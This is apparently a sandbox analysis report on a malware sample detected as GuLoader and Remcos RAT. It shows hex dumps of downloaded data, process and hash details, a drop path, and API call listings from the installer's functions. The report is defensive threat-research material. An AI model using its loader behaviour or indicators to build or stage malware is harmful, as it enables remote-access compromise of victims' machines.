2025-01-10 19:38:49 UTC	16384	IN	Data Raw: 85 69 1c 1b 5a 82 1f f1 a9 1c 4c 39 5b 57 70 d5 cc c7 25 73 02 53 76 b6 b2 64 12 fe 11 5d 8d 16 b9 f5 a6 e3 b2 59 50 08 c0 fc 2e a4 0c 4f 8f 5f 7a 67 67 7c 6c 8b bc c6 0b e7 69 0a ad 4b 47 88 95 fc 6f 1f 93 dc f0 f7 5d f7 27 47 5e 55 f1 cc 1a 97 15 e6 78 f0 9b a2 0a ba 08 45 05 42 4b b2 f7 5d f6 d5 a8 a4 18 aa df 61 b3 42 55 bf bb 76 4c 41 f2 79 34 b8 b1 03 04 0b d1 9a cd 07 f2 61 9f ac d3 f2 04 c4 73 dd 22 51 01 4f b1 95 5c b3 44 d7 27 8f 06 7b df c0 38 c3 f9 29 94 ae 19 5c 55 d8 09 0c 87 a0 c6 36 ef 23 26 01 4b bf 3d 09 8f 8a cd 8d 19 a2 be ee a0 23 95 f3 db 56 c5 aa 93 9d b4 89 52 b6 74 32 a9 f1 92 8e 76 b3 7f 6e 2d 66 98 84 7f 6f 95 6f 05 8f 09 ae 76 d2 42 ae 2a d1 1e ce 5d 42 a8 3c d0 83 54 04 0d a4 01 14 33 18 04 47 a0 e9 a5 86 62 fd cf d1 29 f3 ee Data Ascii: iZL9[Wp%sSvd]YP.O_zgg\|liKGo]'G^UxEBK]aBUvLAy4as"QO\D'{8)\U6#&K=#VRt2vn-foovB*]B<T3Gb)
2025-01-10 19:38:49 UTC	16384	IN	Data Raw: 9e 3d f5 8d e0 2d f1 cc 62 5a 5f a4 6d 05 6e 3b 48 36 d9 eb 0a 24 c8 e7 30 5c de 85 f9 40 30 9e 79 30 d7 e4 ac 65 c0 47 61 bd c0 7c f3 16 da bb f5 3f b2 3f b0 d9 75 0c d8 cd 0e 95 d7 77 06 4e 98 b7 be 9f 4f e1 06 ed 42 41 dd b0 bf 61 6e 1d c1 c3 8a 77 01 0a 32 d8 f6 d6 12 a5 e8 14 a5 72 4c cb fd 03 9a c1 d6 2e e9 46 4b 13 6f ac ff 9a 82 91 e1 02 2a a0 1e 39 ce 94 62 e6 aa 25 4d 40 6a 31 9b ed 5e 69 c6 17 9e 2a c3 30 75 86 8d 4c 4a f1 fc 02 08 1c d2 28 1f 78 8f d0 6e df 9b 73 5e 47 8c fd b4 5c d1 06 24 af 64 a2 ab e2 5e 3c ce 04 5c 7d 43 90 1f 3f 82 fa 12 52 28 33 92 63 02 5c 2a 4f 44 dd eb 8f 49 ad 4f 84 e7 31 33 91 d6 2a db 6c e2 73 e4 8f 3c 13 4b 46 c0 71 23 d6 67 37 a8 d3 d0 71 3d 72 fe c6 78 7c f1 76 c3 09 00 e9 da da f0 8d a6 fa ce d1 c5 89 a6 3d 76 Data Ascii: =-bZ_mn;H6$0\@0y0eGa\|??uwNOBAanw2rL.FKo9b%M@j1^i0uLJ(xns^G\$d^<\}C?R(3c\ODIO13ls<KFq#g7q=rx\|v=v
2025-01-10 19:38:49 UTC	16384	IN	Data Raw: b3 9c 8a b7 58 bc f8 f3 9d 7e 1e 92 67 c2 99 b1 6d 8e 3f 34 0d b0 d8 d8 c9 4d c6 7e 90 4c 9a 93 ca 77 5b 60 88 95 84 6f 29 de 57 81 3a e4 f0 17 e4 5e df b3 6b 29 9e fc 45 36 51 b4 db 7d bf c1 03 41 c5 c9 43 d7 5e 7e e7 7f 64 9e 33 82 7f 1d c2 72 e2 4c 43 09 7f 1f 40 e1 9f a9 c0 86 97 c8 40 cc 74 15 48 e0 49 31 16 5d a5 e4 78 c5 66 7b 7f d4 6d e3 d7 b3 4d 4b a0 1f 1e ac 60 ba ca ef f4 53 bd 8f b1 a3 7f b1 d6 b7 fc e0 89 24 66 8a 0c 85 bf c1 d9 be c2 d7 8a 6e 53 0b bc f7 e7 58 0c 40 3e 41 99 74 0d 59 3d 49 52 b1 39 9c e5 21 4e fb ce f1 dd 9c e2 55 13 b9 65 7b ef 99 bf f1 98 e1 57 5d 9c 25 ba 44 5e c3 1c e3 c2 a7 2d 3b bd 44 6e e8 b4 c5 c9 7c c6 46 57 a6 c4 e5 bc 3f 26 97 a3 fe a4 c6 55 66 d9 c6 fa a1 8a e2 06 b3 1e f3 68 29 ae 52 fc 55 44 25 b0 fb 3d 48 a1 Data Ascii: X~gm?4M~Lw[`o)W:^k)E6Q}AC^~d3rLC@@tHI1]xf{mMK`S$fnSX@>AtY=IR9!NUe{W]%D^-;Dn\|FW?&Ufh)RUD%=H
2025-01-10 19:38:49 UTC	16384	IN	Data Raw: 2a 65 1b 6d 7f 7f 4d bd ec e0 92 fa bc 4d a5 b0 24 21 d3 62 f8 75 86 7f 5a 1a e3 d6 3b e9 ad 25 98 ea 95 9f 05 22 06 91 80 c9 84 54 28 ff 8e 89 12 1e 11 13 05 d0 b8 a7 c3 2d f1 49 7b bc 44 a3 4f 5c 2a 02 de 3a f2 bf 63 81 2f cc 4d 6b 42 b4 22 53 ca ec e6 a5 26 cd 7f e0 9a f8 86 fb c9 a7 13 9f 0f 83 5b 44 f6 2f 44 86 d4 26 e9 93 e1 69 98 ae 7a be b5 b4 07 88 c9 f4 84 7f 86 a6 89 34 36 b1 9a 64 d5 d2 7a 7d 4c d8 27 9f d4 dd be 51 7e 2b 95 62 09 55 8a 78 a3 9a 14 2e 64 22 5b e1 f1 b0 e7 b9 28 1a 2c d9 cc f9 67 fa 55 c1 13 c6 ac d6 d2 5d a9 cd 19 c2 43 7c 05 66 d6 f5 64 1a 81 f9 b7 bf 00 e6 05 ea 16 e8 f6 be 9b fa 5f 36 b6 f6 96 a9 13 21 94 fc b8 9f 85 92 78 cd 50 90 66 21 9c 7e 03 5f 68 a5 98 85 53 94 7f be 96 ba 4c 9d 7c 7c c9 ff 2a 7f 95 9f a9 42 c8 74 f3 Data Ascii: emMM$!buZ;%"T(-I{DO\:c/MkB"S&[D/D&iz46dz}L'Q~+bUx.d"[(,gU]C\|fd_6!xPf!~_hSL\|\|*Bt
2025-01-10 19:38:49 UTC	16384	IN	Data Raw: e3 cd 9d 8e b5 a5 20 00 e3 77 48 5c 75 90 9d 0b 47 58 0c 6c 2c 52 76 f2 4b 72 9a 7b 24 3f dc 7d 2b 8f f6 8f cd 9f 44 7f 41 12 f5 db e3 dd d9 ea 6b 4f 74 8c 9c df 7a 82 3e 30 27 b3 a5 ef fd 46 3f 06 db c1 09 fd 16 4d c0 5c 14 e5 33 f0 1b 5e f0 82 44 d2 83 b4 e2 88 23 04 10 d1 11 73 e7 2c 27 ca 80 fc ce 45 f1 d4 1b d2 54 f0 48 e7 6a a4 ac cd 4f c7 eb b1 b3 7c 48 ac f6 9e e6 39 74 e3 6e e9 a3 93 57 a5 95 ec f2 d3 94 6c b7 93 ba 10 10 5a df 03 96 46 ea ec 10 ab e5 dd ed 16 36 22 95 67 75 76 37 5c 8f c8 76 e0 bc 15 56 b4 0a bc f4 d9 70 cd ca ac 31 7a 07 f2 5e 34 c4 fd da 24 c8 83 76 d0 55 52 09 fb ca d9 fe 38 02 78 09 03 e3 a4 d8 66 d3 66 aa 41 54 77 30 55 57 f5 0e e8 4f 84 e6 40 01 fd b2 e9 db 84 9b 7e 96 3c f0 25 aa 14 fc f2 cf 97 69 3b b5 fa 48 31 b6 4c 65 Data Ascii: wH\uGXl,RvKr{$?}+DAkOtz>0'F?M\3^D#s,'ETHjO\|H9tnWlZF6"guv7\vVp1z^4$vUR8xffATw0UWO@~<%i;H1Le

Target ID:	0
Start time:	14:38:23
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\IpykYx5iwz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IpykYx5iwz.exe"
Imagebase:	0x400000
File size:	1'727'984 bytes
MD5 hash:	15214C528C41DE4D5E542EBD3D4AC075
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1784802321.0000000005E8C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:38:33
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\IpykYx5iwz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IpykYx5iwz.exe"
Imagebase:	0x400000
File size:	1'727'984 bytes
MD5 hash:	15214C528C41DE4D5E542EBD3D4AC075
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.4%
Total number of Nodes:	1328
Total number of Limit Nodes:	43

Executed Functions

Function 00403384 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004033A9
GetVersion.KERNEL32 ref: 004033AF
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033E2
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040341E
OleInitialize.OLE32(00000000), ref: 00403425
SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403441
GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 00403456
CharNextA.USER32(00000000,"C:\Users\user\Desktop\IpykYx5iwz.exe",00000020,"C:\Users\user\Desktop\IpykYx5iwz.exe",00000000,?,00000006,00000008,0000000A), ref: 00403492
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040358F
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A0
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035AC
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C0
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035C8
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D9
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E1
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035F5

Part of subcall function 004064D9: GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
Part of subcall function 004064D9: GetProcAddress.KERNEL32(00000000,?), ref: 00406506

Part of subcall function 0040395E: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness,1033,helsidesannoncen: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,helsidesannoncen: Installing,00000000,00000002,74DF3410), ref: 00403A4E
Part of subcall function 0040395E: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A61
Part of subcall function 0040395E: GetFileAttributesA.KERNEL32(Call), ref: 00403A6C
Part of subcall function 0040395E: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness), ref: 00403AB5
Part of subcall function 0040395E: RegisterClassA.USER32(00423EC0), ref: 00403AF2

Part of subcall function 0040386C: CloseHandle.KERNEL32(000002E8,C:\Users\user\AppData\Local\Temp\,004036A3,?,?,00000006,00000008,0000000A), ref: 0040387E
Part of subcall function 0040386C: CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,004036A3,?,?,00000006,00000008,0000000A), ref: 00403892

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004036A3
ExitProcess.KERNEL32 ref: 004036C4
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 004037E1
OpenProcessToken.ADVAPI32(00000000), ref: 004037E8
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403800
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040381F
ExitWindowsEx.USER32(00000002,80040002), ref: 00403843
ExitProcess.KERNEL32 ref: 00403866

Part of subcall function 0040585D: MessageBoxIndirectA.USER32(0040A230), ref: 004058B8

Strings

1033, xrefs: 004035F0
NSIS Error, xrefs: 00403447
Low, xrefs: 004035C2
SeShutdownPrivilege, xrefs: 004037FA
~nsu, xrefs: 004036CF
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness, xrefs: 00403680
"C:\Users\user\Desktop\IpykYx5iwz.exe", xrefs: 0040345C, 00403462, 00403619
\Temp, xrefs: 004035A6
.tmp, xrefs: 004036EB
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403398
C:\Users\user\AppData\Local\Temp\, xrefs: 00403584, 00403589, 0040359F, 004035AB, 004035BA, 004035C7, 004035D3, 004035DB, 004036D4, 004036E5, 004036F0, 004036FC, 00403709, 00403718, 004037C7
", xrefs: 004034B7
C:\Users\user\Desktop\IpykYx5iwz.exe, xrefs: 00403781
TMP, xrefs: 004035DC
TEMP, xrefs: 004035D4
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness, xrefs: 00403574, 00403675, 0040371F, 00403728
Error launching installer, xrefs: 0040365B
UXTHEME, xrefs: 004033D6, 004033DB, 004033E1
C:\Users\user\Desktop, xrefs: 004036F6, 004036FB, 00403727

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\IpykYx5iwz.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$C:\Users\user\Desktop$C:\Users\user\Desktop\IpykYx5iwz.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 538718688-1556085645
Opcode ID: 3feae3c0fb12c0108577558b9e2af0d6e6bea89c0727ed28e9d7b979ac67a625
Instruction ID: 4384c8e2b939b42067d375ed445cc130ba198a6ce93f9d773e0a7c2deed02dc2
Opcode Fuzzy Hash: 3feae3c0fb12c0108577558b9e2af0d6e6bea89c0727ed28e9d7b979ac67a625
Instruction Fuzzy Hash: 98C108706047506AD721AF75AD49B2B3EACEF81306F05443FF591BA1E2CB7C8A15872E

Function 004053A6 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405405
GetDlgItem.USER32(?,000003EE), ref: 00405414
GetClientRect.USER32(?,?), ref: 00405451
GetSystemMetrics.USER32(00000002), ref: 00405458
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405479
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040548A
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040549D
SendMessageA.USER32(?,00001026,00000000,?), ref: 004054AB
SendMessageA.USER32(?,00001024,00000000,?), ref: 004054BE
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004054E0
ShowWindow.USER32(?,00000008), ref: 004054F4
GetDlgItem.USER32(?,000003EC), ref: 00405515
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405525
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040553E
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040554A
GetDlgItem.USER32(?,000003F8), ref: 00405423

Part of subcall function 00404204: SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212

GetDlgItem.USER32(?,000003EC), ref: 00405566
CreateThread.KERNELBASE(00000000,00000000,Function_0000533A,00000000), ref: 00405574
CloseHandle.KERNELBASE(00000000), ref: 0040557B
ShowWindow.USER32(00000000), ref: 0040559E
ShowWindow.USER32(?,00000008), ref: 004055A5
ShowWindow.USER32(00000008), ref: 004055EB
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040561F
CreatePopupMenu.USER32 ref: 00405630
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405645
GetWindowRect.USER32(?,000000FF), ref: 00405665
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040567E
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056BA
OpenClipboard.USER32(00000000), ref: 004056CA
EmptyClipboard.USER32 ref: 004056D0
GlobalAlloc.KERNEL32(00000042,?), ref: 004056D9
GlobalLock.KERNEL32(00000000), ref: 004056E3
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056F7
GlobalUnlock.KERNEL32(00000000), ref: 00405710
SetClipboardData.USER32(00000001,00000000), ref: 0040571B
CloseClipboard.USER32 ref: 00405721

Strings

0B, xrefs: 00405696

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: 0B
API String ID: 590372296-4132856435
Opcode ID: d3dd3b0b3ca7bb124b3b0ac17d5403135303b194bd715731b282269866f889a6
Instruction ID: 3d4d3d9973c8e241304b7258fdbe4eb8662a2ffc95f0db4602c58cf82c677d54
Opcode Fuzzy Hash: d3dd3b0b3ca7bb124b3b0ac17d5403135303b194bd715731b282269866f889a6
Instruction Fuzzy Hash: 74A16A71900608BFDB119FA4DE89AAE7B79FB48355F00403AFA44B61A0CB754E51DF68

Function 00405909 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,74DF3410,74DF2EE0,00000000), ref: 00405932
lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 0040597A
lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 0040599B
lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 004059A1
FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 004059B2
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A5F
FindClose.KERNEL32(00000000), ref: 00405A70

Strings

\*.*, xrefs: 00405974
"C:\Users\user\Desktop\IpykYx5iwz.exe", xrefs: 00405909

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\IpykYx5iwz.exe"$\*.*
API String ID: 2035342205-4079090417
Opcode ID: c1155a3e0eef8dedcafff871b2087de7bed2f6f65f563fd344c81ee0292e8e18
Instruction ID: 27aaa2d61bcc81dbc7fe7a1ecb0f7f08d06d16e834bef461c94bc9154c43beac
Opcode Fuzzy Hash: c1155a3e0eef8dedcafff871b2087de7bed2f6f65f563fd344c81ee0292e8e18
Instruction Fuzzy Hash: 9651B271A04A04AACB21AB618C89BBF7BB8DF42724F14427BF451751D2D73C4982DE6E

Function 004067CD Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7b46422ea3febcc3dfec7e4f4e14f5e1a14e9fd76d5679f282581756d1a8c3
Instruction ID: 7a1e34af05216305e42a36fadcfa131d67e9d7ad70080566c8310abef1b5d03e
Opcode Fuzzy Hash: 3d7b46422ea3febcc3dfec7e4f4e14f5e1a14e9fd76d5679f282581756d1a8c3
Instruction Fuzzy Hash: 2CF18571D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A86CF45

Function 00406444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(74DF3410,00422580,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00405C0A,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0), ref: 0040644F
FindClose.KERNEL32(00000000), ref: 0040645B

Strings

C:\Users\user\AppData\Local\Temp\nsz7B51.tmp, xrefs: 00406444

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp
API String ID: 2295610775-2847000489
Opcode ID: ae89da06e440076b4ef4d4033fa26a2f04ee7ca33b7c5982e125569f5bb31e91
Instruction ID: 995bcf95c96f44528e39145dd6954a6c4b3f49c7588164c04ee36f3ae4bc57a9
Opcode Fuzzy Hash: ae89da06e440076b4ef4d4033fa26a2f04ee7ca33b7c5982e125569f5bb31e91
Instruction Fuzzy Hash: B3D012715050206BC34017786E0C84B7A589F15330761CB36F4AAF11E0D7748C628A9E

Function 00403CFB Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D37
ShowWindow.USER32(?), ref: 00403D54
DestroyWindow.USER32 ref: 00403D68
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D84
GetDlgItem.USER32(?,?), ref: 00403DA5
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403DB9
IsWindowEnabled.USER32(00000000), ref: 00403DC0
GetDlgItem.USER32(?,00000001), ref: 00403E6E
GetDlgItem.USER32(?,00000002), ref: 00403E78
SetClassLongA.USER32(?,000000F2,?), ref: 00403E92
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403EE3
GetDlgItem.USER32(?,00000003), ref: 00403F89
ShowWindow.USER32(00000000,?), ref: 00403FAA
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FBC
EnableWindow.USER32(?,?), ref: 00403FD7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FED
EnableMenuItem.USER32(00000000), ref: 00403FF4
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040400C
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040401F
lstrlenA.KERNEL32(helsidesannoncen: Installing,?,helsidesannoncen: Installing,00000000), ref: 00404049
SetWindowTextA.USER32(?,helsidesannoncen: Installing), ref: 00404058
ShowWindow.USER32(?,0000000A), ref: 0040418C

Strings

helsidesannoncen: Installing, xrefs: 00404039, 0040403F, 00404048, 00404056

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
